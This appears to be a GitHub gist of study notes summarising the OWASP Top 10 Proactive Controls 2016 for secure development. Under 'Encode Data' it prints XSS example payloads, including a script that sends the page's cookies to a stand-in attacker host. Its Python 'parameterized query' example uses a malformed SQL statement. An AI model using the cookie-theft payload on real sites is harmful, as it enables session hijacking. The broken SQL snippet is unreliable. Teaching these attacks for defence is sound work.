Skip to content

Instantly share code, notes, and snippets.

@ssebastianj

ssebastianj/owasp-top-10-proactive-controls-2016-summary.md

Created August 3, 2016 12:34
Show Gist options
  • Save ssebastianj/fa02298af41b4797711c52b5dcd26592 to your computer and use it in GitHub Desktop.
Save ssebastianj/fa02298af41b4797711c52b5dcd26592 to your computer and use it in GitHub Desktop.
Download ZIP
OWASP Top 10 Controls 2016 Summary
Raw
owasp-top-10-proactive-controls-2016-summary.md

OWASP Top 10 Proactive Controls 2016

Ordered by order of importance, with control number 1 being the most important.

  1. Verify for security early and often.
  2. Parameterize queries.
  3. Encode data.
  4. Validate all inputs.
  5. Implement identity and authentication controls.
  6. Implemente appropiate access controls.
  7. Protect data.
  8. Implement logging and intrusion detection.
  9. Leverage security frameworks and libraries.
  10. Error and exception handling.

1. Verify for Security Early and Often

2. Parameterize Queries

Python Example

email = REQUEST['email']
user_id = REQUEST['id']
cur.execute('execute users set email=:new_email where id=:user_id', {'new_email': email, 'user_id': user_id})

3. Encode Data

XSS site defacement:

<script>document.body.innerHTML("Sebas was here");</script>

XSS session theft:

<script>
    var img = new Image();
    img.src = "http://someevilserver.com?" + document.cookie;
</script>

Types of XSS:

  • Persistent (or Stored XSS)
  • Reflected
  • DOM based

4. Validate All Inputs

The most secure applications treat all variables as untrusted and provide security controls regardless of the source of data.

General approaches to performing input syntax validation:

  • Blacklisting
  • Whitelisting

When building secure software, whitelisting is the generally preferred approach.

Regular Expressions

Care should be exercised when creating regular expressions. Poorly designed expressions may result in potential denial of service conditions (aka ReDDOS).

5. Implement Identity and Authentication Controls

  • Use Multi-Factor Authentication
    • Something the user knows - password or PIN
    • Something the user owns - token or phone
    • Something the user is - biometrics
  • Mobile Application: Token-Based Authentication
  • Implement Secure Password Storage
  • Implement Secure Password Recovery Mechanism
  • Session: Generation and Expiration
  • Require Reauthentication for Sensitive Features

6. Implement Access Controls

Authentication --> Verify an identity.
Authorization --> Access to a particular feature/resource should be granted or denied.

  • Force All Requests to go Through Access Control Check
  • Deny by Default
  • Principle of Least Privilege
  • Avoid Hard-Coded Access Control Checks
  • Code to the Activity
  • Server-Side Trusted Data Should Drive Access Control

7. Protect Data

  • Encrypting Data in Transit
  • Encrypting Data at Rest
  • Implement Protection Transit
  • Mobile Application: Secure Local Storage

8. Implement Logging and Intrusion Detection

9. Leverage Security Frameworks and Libraries

10. Error and Exception Handling

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment